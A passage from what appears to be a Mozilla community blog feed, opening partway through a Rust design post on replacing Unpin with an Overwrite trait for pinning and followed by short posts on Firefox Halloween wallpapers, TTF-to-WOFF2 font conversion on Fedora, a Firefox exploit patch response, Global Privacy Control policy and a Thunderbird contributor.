For s/Unpin/Overwrite/ to work well, we have to make all !Unpin types also be !Overwrite. This is not, strictly speaking, backwards compatible, since today !Unpin types (like all types) can be overwritten and swapped. I think eventually we want every type to be !Overwrite by default, but I don’t think we can change that default in a general way without an edition. But for !Unpin types in particular I suspect we can get away with it, because !Unpin types are pretty rare, and the simplification we get from doing so is pretty large. (And, as I argued in the previous post, there is no loss of expressiveness; code today that overwrites or swaps !Unpin values can be locally rewritten.)

Why swaps are bad without s/Unpin/Overwrite/

Today, Pin<&mut T> cannot be converted into an &mut T reference unless T: Unpin.5 This is because it would allow safe Rust code to create Undefined Behavior by swapping the referent of the &mut T reference and hence moving the pinned value. By requiring that T: Unpin, the DerefMut impl is effectively limiting itself to references that are not, in fact, in the “pinned” state, but just in the “initialized” state.
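
Concretely, the standard library only implements DerefMut for Pin<P> when the target type is Unpin, so assignment through a pinned reference is gated on that bound. A small illustration of the consequence (a sketch; the function is made up):

use std::pin::Pin;

// Assigning through a `Pin<&mut T>` goes through `DerefMut`, which `Pin`
// only provides when `T: Unpin`. Remove the `Unpin` bound and this
// function no longer compiles.
fn overwrite<T: Unpin + Default>(mut p: Pin<&mut T>) {
    *p = T::default();
}

fn main() {
    let mut x = 41_u32;
    overwrite(Pin::new(&mut x));
    assert_eq!(x, 0);
}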

As a result, Pin<&mut T> and &mut T methods don’t interoperate today

This leads directly to our first two pain points. To start, from a Pin<&mut Self> method, you can only invoke &self methods (via the Deref impl) or other Pin<&mut Self> methods. This schism separates out the “regular” methods of a type from its pinned methods; it also means that methods doing field assignments don’t compile:

fn increment_field(self: Pin<&mut Self>) {
    self.field = self.field + 1;
}

This errors because compiling a field assignment requires a DerefMut impl and Pin<&mut Self> doesn’t have one.
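
For comparison, the escape hatch available today is unsafe: Pin::get_unchecked_mut asserts that you will not move the value out of its place. A hedged sketch of the kind of boilerplate this proposal would remove:

use std::pin::Pin;

struct Counter {
    field: u32,
}

impl Counter {
    fn increment_field(self: Pin<&mut Self>) {
        // SAFETY: we only mutate `field` in place; we never move the
        // value out of its pinned place.
        let this = unsafe { self.get_unchecked_mut() };
        this.field += 1;
    }
}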

With s/Unpin/Overwrite/, Pin<&mut Self> is a subtype of &mut Self

s/Unpin/Overwrite/ allows us to implement DerefMut for all pinned types. This is because, unlike Unpin, Overwrite affects how &mut works, and hence &mut T would preserve the pinned state for the place it references. Consider the two possibilities for the value of type T referred to by the &mut T:

  • If T: Overwrite, then the value is not pinnable, and so the place cannot be in the pinned state.
  • If T: !Overwrite, the value could be pinned, but we also cannot overwrite or swap it, and so pinning is preserved.

This implies that Pin<&mut T> is in fact a generalized version of &mut T. Every &'a mut T keeps the value pinned for the duration of its lifetime 'a, but a Pin<&mut T> ensures the value stays pinned for the lifetime of the underlying storage.

If we have a DerefMut impl, then Pin<&mut Self> methods can freely call &mut self methods. Big win!

Today you must categorize fields as “structurally pinned” or not

The other pain point today with Pin is that we have no native support for “pin projection”6. That is, you cannot safely go from a Pin<&mut Self> reference to a Pin<&mut F> reference referring to some field self.f without relying on unsafe code.

The most common practice today is to use a custom crate like pin-project-lite. Even then, you also have to make a choice for each field between whether you want to be able to get a Pin<&mut F> reference or a normal &mut F reference. Fields for which you can get a pinned reference are called structurally pinned and the criteria for which one you should use is rather subtle. Ultimately this choice is required because Pin<&mut F> and &mut F don’t play nicely together.
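
For reference, here is roughly what that choice looks like with pin-project-lite today (a sketch; the type and field names are made up): fields marked #[pin] are structurally pinned and project to Pin<&mut F>, everything else projects to an ordinary &mut.

use std::pin::Pin;
use pin_project_lite::pin_project;

pin_project! {
    struct Wrapper<F> {
        #[pin]
        fut: F,        // structurally pinned: projects to `Pin<&mut F>`
        polls: usize,  // not pinned: projects to `&mut usize`
    }
}

impl<F> Wrapper<F> {
    fn parts(self: Pin<&mut Self>) -> (Pin<&mut F>, &mut usize) {
        let this = self.project();
        (this.fut, this.polls)
    }
}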

Pin projection is safe from any !Overwrite type

With s/Unpin/Overwrite/, we can scrap the idea of structural pinning. Instead, if we have a field owner self: Pin<&mut Self>, pinned projection is allowed so long as Self: !Overwrite. That is, if Self: !Overwrite, then I can always get a Pin<&mut F> reference to some field self.f of type F. How is that possible?

Actually, the full explanation relies on borrow checker extensions I haven’t introduced yet. But let’s see how far we get without them, so that we can see the gap that the borrow checker has to close.

Assume we are creating a Pin<&'a mut F> reference r to some field self.f, where self: Pin<&mut Self>:

  • We are creating a Pin<&'a mut F> reference to the value in self.f:
    • If F: Overwrite, then the value is not pinnable, so this is equivalent to an ordinary &mut F and we have nothing to prove.
    • Else, if F: !Overwrite, then we have to show that the value in self.f will not move for the remainder of its lifetime.
      • Pin projection from *self is only valid if Self: !Overwrite and self: Pin<&'b mut Self>, so we know that the value in *self is pinned for the remainder of its lifetime by induction.
      • We have to show then that the value v_f in self.f will never be moved until the end of its lifetime.

There are three ways to move a value out of self.f:

  • You can assign a new value to self.f, like self.f = ....
    • This will run the destructor, ending the lifetime of the value v_f.
  • You can create a mutable reference r = &mut self.f and then…
    • assign a new value to *r: but that will be an error because F: !Overwrite.
    • swap the value in *r with another: but that will be an error because F: !Overwrite.

QED. =)

Making Pin-based APIs easier to call

Today, getting a Pin<&mut> requires using the pin! macro, going through Box::pin, or some similar explicit action. This adds “syntactic salt” to calling a Pin<&mut Self> method: you must first pin the value with pin! or some other abstraction rooted in unsafe (e.g., Box::pin). There is no built-in way to safely create a pinned reference. This is fine, but it introduces ergonomic hurdles.

We want to make calling a Pin<&mut Self> method as easy as calling an &mut self method. To do this, we need to extend the compiler’s notion of “auto-ref” to include the option of “auto-pin-ref”:

// Instead of this:
let future: Pin<&mut impl Future> = pin!(async { ... });
future.poll(cx);

// We would do this:
let mut future: impl Future = async { ... };
future.poll(cx); // <-- Wowee!

Just as a typical method call like vec.len() expands to Vec::len(&vec), the compiler would be expanding future.poll(cx) to something like so:

Future::poll(&pinned mut future, cx)
//           ^^^^^^^^^^^ but what, what's this?

This expansion though includes a new piece of syntax that doesn’t exist today, the &pinned mut operation. (I’m lifting this syntax from boats’ pinned places proposal.)

Whereas &mut var results in an &mut T reference (assuming var: T), &pinned mut var borrow would result in a Pin<&mut T>. It would also make the borrow checker consider the value in future to be pinned. That means that it is illegal to move out from var. The pinned state continues indefinitely until var goes out of scope or is overwritten by an assignment like var = ... (which drops the heretofore pinned value). This is a fairly straightforward extension to the borrow checker’s existing logic.

New syntax not strictly required

It’s worth noting that we don’t actually need the &pinned mut syntax (which means we don’t need the pinned keyword). We could make it so that the only way to get the compiler to do a pinned borrow is via auto-ref. We could even add a silly trait to make it explicit, like so:

trait Pinned {
    fn pinned(self: Pin<&mut Self>) -> Pin<&mut Self>;
}

impl<T: ?Sized> Pinned for T {
    fn pinned(self: Pin<&mut T>) -> Pin<&mut T> {
        self
    }
}

Now you can write var.pinned(), which the compiler would desugar to Pinned::pinned(&rustc#pinned mut var). Here I am using rustc#pinned to denote an “internal keyword” that users can’t type.7

Frequently asked questions

So…there’s a lot here. What are the key takeaways?

The shortest version of this post I can manage is8

  • Pinning fits smoothly into Rust if we make two changes:
    • Limit the ability to swap types by default, making Pin<&mut T> a subtype of &mut T and enabling uniform pin projection.
    • Integrate pinning in the auto-ref rules and the borrow checker.
Why do you only mention swaps? Doesn’t Overwrite affect other things?

Indeed the Overwrite trait as I defined it is overkill for pinning. To be more precise, we might imagine two special traits that affect how and when we can drop or move values:

trait DropWhileBorrowed: Sized { }
trait Swap: DropWhileBorrowed { }

  • Given a reference r: &mut T, overwriting its referent *r with a new value would require T: DropWhileBorrowed;
  • Swapping two values of type T requires that T: Swap.
    • This is true regardless of whether they are borrowed or not.

Today, every type is Swap. What I argued in the previous post is that we should make the default be that user-defined types implement neither of these two traits (over an edition, etc etc). Instead, you could opt-in to both of them at once by implementing Overwrite.

But we could get all the pin benefits by making a weaker change. Instead of having types opt out from both traits by default, they could only opt out of Swap, but continue to implement DropWhileBorrowed. This is enough to make pinning work smoothly. To see why, recall the pinning state diagram: dropping the value in *r (permitted by DropWhileBorrowed) will exit the “pinned” state and return to the “uninitialized” state. This is valid. Swapping, in contrast, is UB.

Two subtle observations here worth calling out:

  1. Both DropWhileBorrowed and Swap have Sized as a supertrait. Today in Rust you can’t drop a &mut dyn SomeTrait value and replace it with another, for example. I think it’s a bit unclear whether unsafe code could do this if it knows the dynamic type of the value behind the dyn. But under this model, it would only be valid for unsafe code to do that drop if (a) it knew the dynamic type and (b) the dynamic type implemented DropWhileBorrowed. Same applies to Swap.
  2. The Swap trait applies longer than just the duration of a borrow. This is because, once you pin a value to create a Pin<&mut T> reference, the state of being pinned persists even after that reference has ended. I say a bit more about this in another FAQ below.

EDIT: An earlier draft of this post named the trait Swap. This was wrong, as described in the FAQ on subtle reasoning.

Why then did you propose opting out from both overwrites and swaps?

Opting out of overwrites (i.e., making the default be neither DropWhileBorrowed nor Swap) gives us the additional benefit of truly immutable fields. This will make cross-function borrows less of an issue, as I described in my previous post, and make some other things (e.g., variance) less relevant. Moreover, I don’t think overwriting an entire reference like *r is that common, versus accessing individual fields. And in the cases where people do do it, it is easy to make a dummy struct with a single field, and then overwrite r.value instead of *r. To me, therefore, distinguishing between DropWhileBorrowed and Swap doesn’t obviously carry its weight.

Can you come up with a more semantic name for Overwrite?

All the trait names I’ve given so far (Overwrite, DropWhileBorrowed, Swap) answer the question of “what operation does this trait allow”. That’s pretty common for traits (e.g., Clone or, for that matter, Unpin) but it is sometimes useful to think instead about “what kinds of types should implement this trait” (or not implement it, as the case may be).

My current favorite “semantic style name” is Mobile, which corresponds to implementing Swap. A mobile type is one that, while borrowed, can move to a new place. This name doesn’t convey that it’s also ok to drop the value, but that follows, since if you can swap the value to a new place, you can presumably drop that new place.

I don’t have a “semantic” name for DropWhileBorrowed. As I said, I’m hard pressed to characterize the type that would want to implement DropWhileBorrowed but not Swap.

What do DropWhileBorrowed and Swap have in common?

These traits pertain to whether an owner who lends out a local variable (i.e., executes r = &mut lv) can rely on that local variable lv to store the same value after the borrow completes. Under this model, the answer depends on the type T of the local variable:

  • If T: DropWhileBorrowed (or T: Swap, which implies DropWhileBorrowed), the answer is “no”, the local variable may point at some other value, because it is possible to do *r = /* new value */.
  • But if T: !DropWhileBorrowed, then the owner can be sure that lv still stores the same value (though lv’s fields may have changed).

Let’s use an analogy. Suppose I own a house and I lease it out to someone else to use. I expect that they will make changes on the inside, such as hanging up a new picture. But I don’t expect them to tear down the house and build a new one on the same lot. I also don’t expect them to drive up a flatbed truck, load my house onto it, and move it somewhere else (while providing me with a new one in return). In Rust today, a reference r: &mut T allows all of these things:

  • Mutating a field like r.count += 1 corresponds to hanging up a picture. The values inside r change, but r still refers to the same conceptual value.
  • Overwriting *r = t with a new value t is like tearing down the house and building a new one. The original value that was in r no longer exists.
  • Swapping *r with some other reference *r2 is like moving my house somewhere else and putting a new house in its place.

EDIT: Wording refined based on feedback.

What does it mean to be the “same value”?

One question I received was what it meant for two structs to have the “same value”? Imagine a struct with all public fields – can we make any sense of it having an identity? The way I think of it, every struct has a “ghost” private field $identity (one that doesn’t exist at runtime) that contains its identity. Every StructName { } expression has an implicit $identity: new_value() that assigns the identity a distinct value from every other struct that has been created thus far. If two struct values have the same $identity, then they are the same value.

Admittedly, if a struct has all public fields, then it doesn’t really matter whether its identity is the same, except perhaps to philosophers. But most structs don’t.
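
One (entirely hypothetical) way to picture the ghost field is to imagine reifying it as a real, unforgeable token, along these lines:

use std::sync::atomic::{AtomicU64, Ordering};

static NEXT_ID: AtomicU64 = AtomicU64::new(0);

// Stands in for the ghost `$identity` field: unique per constructed value,
// deliberately not `Clone` or `Copy`.
struct Identity(u64);

impl Identity {
    fn new() -> Self {
        Identity(NEXT_ID.fetch_add(1, Ordering::Relaxed))
    }
}

struct Point {
    x: i32,
    y: i32,
    identity: Identity,
}

fn same_value(a: &Point, b: &Point) -> bool {
    // Two `Point`s are "the same value" only if their identities match,
    // even when `x` and `y` happen to be equal.
    a.identity.0 == b.identity.0
}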

An example that can help clarify this is what I call the “scope pattern”. Imagine I have a Scope type that has some private fields and which can be “installed” in some way and later “deinstalled” (perhaps it modifies thread-local values):

pub struct Scope {...}

impl Scope {
    fn new() -> Self { /* install scope */ }
}

impl Drop for Scope {
    fn drop(&mut self) {
        /* deinstall scope */
    }
}

And the only way for users to get their hands on a “scope” is to use with_scope, which ensures it is installed and deinstalled properly:

pub fn with_scope(op: impl FnOnce(&mut Scope)) {
    let mut scope = Scope::new();
    op(&mut scope);
}

It may appear that this code enforces a “stack discipline”, where nested scopes will be installed and deinstalled in a stack-like fashion. But in fact, thanks to std::mem::swap, this is not guaranteed:

with_scope(|s1| {
    with_scope(|s2| {
        std::mem::swap(s1, s2);
    })
})

This could easily cause logic bugs or, if unsafe is involved, something worse. This is why lending out scopes requires some extra step to be safe, such as using a &-reference or adding a “fresh” lifetime parameter of some kind to ensure that each scope has a unique type. In principle you could also use a type like &mut dyn ScopeTrait, because the compiler disallows overwriting or swapping dyn Trait values: but I think it’s ambiguous today whether unsafe code could validly do such a swap.
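
Here is a sketch of the “fresh” lifetime workaround mentioned above, using the usual branded-lifetime trick (my sketch, not from the original post): each call to with_scope sees its own invariant 'brand, so two scopes from different calls have different types and std::mem::swap between them no longer type-checks.

use std::marker::PhantomData;

pub struct Scope<'brand> {
    // Invariant in `'brand`, so scopes with different brands cannot be
    // coerced into one another.
    _brand: PhantomData<fn(&'brand ()) -> &'brand ()>,
}

pub fn with_scope(op: impl for<'brand> FnOnce(&mut Scope<'brand>)) {
    let mut scope = Scope { _brand: PhantomData };
    // install scope ...
    op(&mut scope);
    // ... deinstall scope
}

With this signature, the nested with_scope example above fails to compile at the std::mem::swap(s1, s2) call, because s1 and s2 have distinct brands.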

EDIT: Question added based on feedback.

There’s a lot of subtle reasoning in this post. Are you sure this is correct?

I am pretty sure! But not 100%. I’m definitely scared that people will point out some obvious flaw in my reasoning. But of course, if there’s a flaw I want to know. To help people analyze, let me recap the two subtle arguments that I made in this post and the reasoning behind them.

Lemma. Given some local variable lv: T where T: !Overwrite mutably borrowed by a reference r: &'a mut T, the value in lv cannot be dropped, moved, or forgotten for the lifetime 'a.

During 'a, the variable lv cannot be accessed directly (per the borrow checker’s usual rules). Therefore, any drops/moves/forgets must take place to *r:

  • Because T: !Overwrite, it is not possible to overwrite or swap *r with a new value; it is only legal to mutate individual fields. Therefore the value cannot be dropped or moved.
  • Forgetting a value (via std::mem::forget) requires ownership and is not accessible while lv is borrowed.

Theorem A. If we replace T: Unpin with T: Overwrite, then Pin<&mut T> is a safe subtype of &mut T.

The argument proceeds by cases:

  • If T: Overwrite, then Pin<&mut T> does not refer to a pinned value, and hence it is semantically equivalent to &mut T.
  • If T: !Overwrite, then Pin<&mut T> does refer to a pinned value, so we must show that the pinning guarantee cannot be disturbed by the &mut T. By our lemma, the &mut T cannot move or forget the pinned value, which is the only way to disturb the pinning guarantee.

Theorem B. Given some field owner o: O where O: !Overwrite with a field f: F, it is safe to pin-project from Pin<&mut O> to a Pin<&mut F> reference referring to o.f.

The argument proceeds by cases:

  • If F: Overwrite, then Pin<&mut F> is equivalent to &mut F. We showed in Theorem A that Pin<&mut O> could be upcast to &mut O and it is possible to create an &mut F from &mut O, so this must be safe.
  • If F: !Overwrite, then Pin<&mut F> refers to a pinned value found in o.f. The lemma tells us that the value in o.f will not be disturbed for the duration of the borrow.

EDIT: It was pointed out to me that this last theorem isn’t quite proving what it needs to prove. It shows that o.f will not be disturbed for the duration of the borrow, but to meet the pin rules, we need to ensure that the value is not swapped even after the borrow ends. We can do this by committing to never permit swaps of values unless T: Overwrite, regardless of whether they are borrowed. I meant to clarify this in the post but forgot about it, and then I made a mistake and talked about Swap – but Swap is the right name.

What part of this post are you most proud of?

Geez, I’m so glad you asked! Such a thoughtful question. To be honest, the part of this post that I am happiest with is the state diagram for places, which I’ve found very useful in helping me to understand Pin:

flowchart TD
Uninitialized 
Initialized
Pinned

Uninitialized --
    `p = v` where `v: T`
--> Initialized

Initialized -- 
    move out, drop, or forget
--> Uninitialized

Initialized --
    pin value `v` in `p`
    (only possible when `T` is `!Unpin`)
--> Pinned

Pinned --
    drop value
--> Uninitialized

Pinned --
    move out or forget
--> UB

Uninitialized --
    free the place
--> Freed

UB[💥 Undefined behavior 💥]
  

Obviously this question was just an excuse to reproduce it again. Some of the key insights that it helped me to crystallize:

  • A value that is Unpin cannot be pinned:
    • And hence Pin<&mut Self> really means “reference to a maybe-pinned value” (a value that is pinned if it can be).
  • Forgetting a value is very different from leaking the place that value is stored:
    • In both cases, the value’s Drop never runs, but only one of them can lead to a “freed place”.

In thinking through the stuff I wrote in this post, I’ve found it very useful to go back to this diagram and trace through it with my finger.

Is this backwards compatible?

Maybe? The question does not have a simple answer. I will address it in a future blog post in this series. Let me say a few points here though:

First, the s/Unpin/Overwrite/ proposal is not backwards compatible as I described. It would mean for example that all futures returned by async fn are no longer Overwrite. It is quite possible we simply can’t get away with it.

That’s not fatal, but it makes things more annoying. It would mean there exist types that are !Unpin but which can be overwritten. This in turn means that Pin<&mut Self> is not a subtype of &mut Self for all types. Pinned mutable references would be a subtype for almost all types, but not those that are !Unpin && Overwrite.

Second, a naive, conservative transition would definitely be rough. My current thinking is that, in older editions, we add T: Overwrite bounds by default on type parameters T and, when you have a T: SomeTrait bound, we would expand that to include a Overwrite bound on associated types in SomeTrait, like T: SomeTrait<AssocType: Overwrite>. When you move to a newer edition I think we would just not add those bounds. This is kind of a mess, though, because if you call code from an older edition, you are still going to need those bounds to be present.

That all sounds painful enough that I think we might have to do something smarter, where we don’t always add Overwrite bounds, but instead use some kind of inference in older editions to avoid it most of the time.

Conclusion

My takeaway from authoring this post is that something like Overwrite has the potential to turn Pin from wizard level Rust into mere “advanced Rust”, somewhat akin to knowing the borrow checker really well. If we had no backwards compatibility constraints to work with, it seems clear that this would be a better design than Unpin as it is today.

Of course, we do have backwards compatibility constraints, so the real question is how we can make the transition. I don’t know the answer yet! I’m planning on thinking more deeply about it (and talking to folks) once this post is out. My hope was first to make the case for the value of Overwrite (and to be sure my reasoning is sound) before I invest too much into thinking how we can make the transition.

Assuming we can make the transition, I’m wondering two things. First, is Overwrite the right name? Second, should we take the time to re-evaluate the default bounds on generic types in a more complete way? For example, to truly have a nice async story, and for myriad other reasons, I think we need must-move types. How does that fit in?


  1. The precise design of generators is of course an ongoing topic of some controversy. I am not trying to flesh out a true design here or take a position. Mostly I want to show that we can create ergonomic bridges between “must pin” types like generators and “non pin” interfaces like Iterator in an ergonomic way without explicit mentioning of pinning. ↩︎

  2. Boats has argued that, since no existing iterator can support borrows over a yield point, generators might not need to do so either. I don’t agree. I think supporting borrows over yield points is necessary for ergonomics just as it was in futures↩︎

  3. Actually for Pin<impl DerefMut<Target: Generator>>↩︎

  4. I will say, I use std::mem::forget quite regularly, but mostly to make up for a shortcoming in Drop. I would like it if Drop had a separate method, fn drop_on_unwind(&mut self), and we invoked that method when unwinding. Most of the time, it would be the same as regular drop, but in some cases it’s useful to have cleanup logic that only runs in the case of unwinding. ↩︎

  5. In contrast, a Pin<&mut T> reference can be safely converted into an &T reference, as evidenced by Pin’s Deref impl. This is because, even if T: !Unpin, a &T reference cannot do anything that is invalid for a pinned value. You can’t swap the underlying value or read from it. ↩︎

  6. Projection is the wonky PL term for “accessing a field”. It’s never made much sense to me, but I don’t have a better term to use, so I’m sticking with it. ↩︎

  7. We have a syntax k#foo for explicitly referring to a keyword foo. It is meant to be used only for keywords that will be added in future Rust editions. However, I sometimes think it’d be neat to have internal-ish keywords (like k#pinned) that are used in desugaring but rarely need to be typed explicitly; you would still be able to write k#pinned if for whatever reason you wanted to. And of course we could later opt to stabilize it as pinned (no prefix required) in a future edition. ↩︎

  8. I tried asking ChatGPT to summarize the post but, when I pasted in my post, it replied, “The message you submitted was too long, please reload the conversation and submit something shorter.” Dang ChatGPT, that’s rude! Gemini at least gave it the old college try. Score one for Google. Plus, it called my post “thought-provoking!” Aww, I’m blushing! ↩︎

The Mozilla BlogIt’s Halloween — pick your spooky Firefox disguise

Halloween is creeping up on us, and this year, Firefox is getting into the spirit with a spooky twist: Our iconic fox has transformed into a lineup of eerie disguises.

The real magic, of course, is that Firefox helps keep your online identity safe all year long. But in the spirit of Halloween, we’ve created something special to help you celebrate the season – whether you’re refreshing your wallpaper or adding some Halloween flair to your socials. Check out Firefox’s spooky disguises.

Frankenfox 

A patchwork fox brought to life, sewn from threads across the web. Credit: Michael Ham / Mozilla

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Mummy Fox

Wrapped in mystery and ready to haunt your screen. Credit: Michael Ham / Mozilla

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper

Vampire Fox 

Sharp, sleek and stylish – with a byte. Credit: Michael Ham / Mozilla

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Werefox

A wild creature of the night, prowling the web. Credit: Michael Ham / Mozilla

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Witchfox

Stirring up online magic with a wicked look. Credit: Michael Ham / Mozilla

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

Zombie Fox

Our classic fox with a dash of the undead, ready to haunt the web. Credit: Michael Ham / Mozilla

Click on the following to download: Logo only, logo with background, desktop wallpaper, mobile wallpaper 

How to use

  1. Click and save your favorite from the links above. 
  2. Update your profile pictures, desktop and mobile wallpapers with our spooktacular designs.
  3. Tag us on social with #SpookyFirefox and let us know which Firefox disguise you’ve chosen to be this Halloween!

Whether you’re haunting your screen or casting a spell on your digital space, Firefox’s Halloween disguises are here to help you embrace the spirit of the season.

So, which spooky disguise will you choose this Halloween?

Get Firefox

Get the browser that protects what’s important

The post It’s Halloween — pick your spooky Firefox disguise appeared first on The Mozilla Blog.

Don Marticonvert TTF to WOFF2 on Fedora Linux

If you have a font in TTF (TrueType) format and need WOFF2 for web use, there is a woff2_compress utility packaged for Fedora (but still missing a man page and --help feature.) The package is woff2-tools.

sudo dnf install woff2-tools
woff2_compress example.ttf

Also packaged for Debian: Details of package woff2 in sid

WOFF

For the older WOFF format (which I needed in order to have the font show up on a really old browser) the tool is sfnt2woff-zopfli.

Install and run with:

sudo dnf install sfnt2woff-zopfli
sfnt2woff-zopfli example.ttf

References

Converting TTF fonts to WOFF2 (and WOFF) - DEV Community (covers cloning and building from source)

How to Convert Font Formats to WOFF under Linux (compares several conversion tools)

Related

colophon (This site mostly uses Modern Font Stacks but has some Inconsolata.)

Bonus links

The AI bill Newsom didn’t veto — AI devs must list models’ training data From 2026, companies that make generative AI models available in California need to list their models’ training sets on their websites — before they release or modify the models. (The California Chamber of Commerce came out against this one, citing the technical difficulty in complying. They’re probably right, especially considering that under the CCPA, businesses are required to disclose inferences about people (PDF) and it’s hard to figure out which inferences are present in a large ML model.)

Antitrust challenge to Facebook’s ‘superprofiling’ finally wraps in Germany — with Meta agreeing to data limits Meta has to offer a cookie setting that allows Facebook and Instagram users to decide whether they want to allow it to combine their data with other information Meta collects about them — via third-party websites where its tracking technologies are embedded or from apps using its business tools — or keep it separate. But some of the required privacy+competition fixes must be Germany-only. (imho some US state needs a law that any privacy or consumer protection feature that a large company offers to users outside the US must also be available in that state.)

IAB, Others Urge Court To Reconsider Ruling That Curbed Section 230 10/10/2024 (Some background on this one: TikTok Inspired Child Suicide Prompts a Sound Reading of Section 230 The problem with this case from TikTok’s point of view is that Big Tech wants to keep claiming that its recommendation algorithms are somehow both the company’s own free speech and speech by users. But the Third Circuit is making them pick one. Given the Supreme Court’s observations that platforms engage in protected first-party speech under the First Amendment when they curate compilations of others’ content via their expressive algorithms, it follows that doing so amounts to first-party speech under § 230, too.)

California Privacy Act Sparks Website Tracking Technology Suits (This is a complicated one. Lawsuit accuses a company of breaking not one, not two, but three California privacy laws. And the California Constitution, too. Motion to dismiss mostly denied (PDF). Including a CCPA claim. Yes, there is a CCPA private right of action. CCPA claims survive a motion to dismiss where a plaintiff alleges that defendants disclosed plaintiff’s personal information without his consent due to the business’s failure to maintain reasonable security practices. In this case, Google Analytics tracking on a therapy site. I have some advice on how to get out in front of this kind of case, will share later.)

Digital Scams More Likely to Hurt Black and Latino Consumers - Consumer Reports Compounding the problem, experts believe, is that Black and Latino consumers are disproportionately targeted by a wide variety of digital scams. (This is a big reason why the I have nothing to hide argument about privacy doesn’t work. When a user who is less likely to be discriminated against chooses to participate in a system with personalization risks, that user’s information helps make user-hostile personalization against others work better. Privacy is a collective problem.)

ClassicPress: WordPress without the block editor [LWN.net] Once installed (or migrated), ClassicPress looks and feels like old-school WordPress.

Google never cared about privacy It was a bit of a tell how the DV360 product team demonstrated zero sense of urgency around making it easier for some buyers to test Privacy Sandbox, let alone releasing test results to prove it worked. The Chrome cookie deprecation delays, the inability of any ad tech expert or observer to convincingly explain how Google could possibly regulate itself — all of these deserve renewed scrutiny, given what we now know. (Google Privacy Sandbox was never offered as an option for YouTube, either. The point of janky in-browser ads is to make the slick YouTube ads, which have better reporting, look better to advertisers who have to allocate budget between open web and YouTube.)

Taylor Swift: Singer, Songwriter, Copyright Innovator [R]ecord companies are now trying to prohibit re-recordings for 20 or 30 years, not just two or three. And this has become a key part of contract negotiations. Will they get 30 years? Probably not, if the lawyer is competent. But they want to make sure that the artist’s vocal cords are not in good shape by the time they get around to re-recording.

Mozilla Security BlogBehind the Scenes: Fixing an In-the-Wild Firefox Exploit

At Mozilla, browser security is a critical mission, and part of that mission involves responding swiftly to new threats. Tuesday, around 8 AM Eastern time, we received a heads-up from the Anti-Virus company ESET, who alerted us to a Firefox exploit that had been spotted in the wild. We want to give a huge thank you to ESET for sharing their findings with us—it’s collaboration like this that keeps the web a safer place for everyone.

We’ve already released a fix for this particular issue, so when Firefox prompts you to upgrade, click that button. If you don’t know about Session Restore, you can ask Firefox to restore your previous session on restart.

The sample ESET sent us contained a full exploit chain that allowed remote code execution on a user’s computer. Within an hour of receiving the sample, we had convened a team of security, browser, compiler, and platform engineers to reverse engineer the exploit, force it to trigger its payload, and understand how it worked.

During exploit contests such as pwn2own, we know ahead of time when we will receive an exploit, can convene the team ahead of time, and receive a detailed explanation of the vulnerabilities and exploit. At pwn2own 2024, we shipped a fix in 21 hours, something that helped us earn an industry award for fastest to patch. This time, with no notice and some heavy reverse engineering required, we were able to ship a fix in 25 hours. (And we’re continually examining the process to help us drive that down further.)

While we take pride in how quickly we respond to these threats, it’s only part of the process. While we have resolved the vulnerability in Firefox, our team will continue to analyze the exploit to find additional hardening measures to make deploying exploits for Firefox harder and rarer. It’s also important to keep in mind that these kinds of exploits aren’t unique to Firefox. Every browser (and operating system) faces security challenges from time to time. That’s why keeping your software up to date is crucial across the board.

As always, we’ll keep doing what we do best—strengthening Firefox’s security and improving its defenses.

The post Behind the Scenes: Fixing an In-the-Wild Firefox Exploit appeared first on Mozilla Security Blog.

Mozilla Privacy BlogHow Lawmakers Can Help People Take Control of Their Privacy

At Mozilla, we’ve long advocated for universal opt-out mechanisms that empower people to easily assert their privacy rights. A prime example of this is Global Privacy Control (GPC), a feature built into Firefox. When enabled, GPC sends a clear signal to websites that the user does not wish to be tracked or have their personal data sold.
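
For a sense of what honoring that signal can look like on the receiving end, here is a minimal client-side sketch in TypeScript. It assumes the proposed navigator.globalPrivacyControl property (exposed by browsers that support GPC) and a hypothetical loadOptionalTrackingScripts helper standing in for whatever optional analytics a site would gate; servers can check the Sec-GPC: 1 request header instead.

```typescript
// Minimal sketch: gate optional trackers on the Global Privacy Control signal.
// navigator.globalPrivacyControl is the proposed GPC property exposed by supporting
// browsers; loadOptionalTrackingScripts is a hypothetical site-specific loader.
declare global {
  interface Navigator {
    globalPrivacyControl?: boolean;
  }
}

declare function loadOptionalTrackingScripts(): void; // hypothetical

function userOptedOut(): boolean {
  return navigator.globalPrivacyControl === true;
}

if (userOptedOut()) {
  // Treat the visit as opted out of sale/sharing and skip optional trackers.
  console.info("GPC detected: skipping optional tracking scripts.");
} else {
  loadOptionalTrackingScripts();
}

export {}; // keep this file a module so the global augmentation above is valid
```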

California’s landmark privacy law, the CCPA, mandates that tools like GPC must be respected, giving consumers greater control over their data. Encouragingly, similar provisions are emerging in other state laws. Yet, despite this progress, many browsers and operating systems – including the largest ones – still do not offer native support for these mechanisms.

That’s why we were encouraged by the advancement of California AB 3048, a bill that would require browsers and mobile operating systems to include an opt-out setting, allowing consumers to easily communicate their privacy preferences.

Mozilla was disappointed that AB 3048 was not signed into law. The bill was a much-needed step in the right direction.

As policymakers advance similar legislation in the future, we’d propose small changes to the AB 3048 text. These changes would ensure that the bill doesn’t leave so much room for interpretation that it creates loopholes which undermine its core purpose and weaken existing standards like Global Privacy Control. It’s essential that rules prioritize consumer privacy and meet the expectations that consumers rightly have about treatment of their sensitive personal information.

Mozilla remains committed to working alongside California as the legislature considers its agenda for 2025, as well as other states and ultimately the U.S. Congress, to advance meaningful privacy protections for all people online. We hope to see legislation bolstering this key privacy tool reemerge in California, and advance throughout the US.

The post How Lawmakers Can Help People Take Control of Their Privacy appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdContributor Highlight: Toad Hall

We’re back with another contributor highlight! We asked our most active contributors to tell us about what they do, why they enjoy it, and themselves. Last time, we talked with Arthur, and for this installment, we’re chatting with Toad Hall.

If you’ve used Support Mozilla (SUMO) to get help with Thunderbird, Toad Hall may have helped you. They are one of our most dedicated contributors, and their answers on SUMO have helped countless people.

How and Why They Use Thunderbird

Thunderbird has been my choice of email client since version 3, so I have witnessed this product evolve and improve over the years. Sometimes, a new design can initially derail you. Being of an older generation, I appreciate it is not necessarily so easy to adapt to change, but I’ve always tried to embrace new ideas and found that generally, the changes are an improvement.

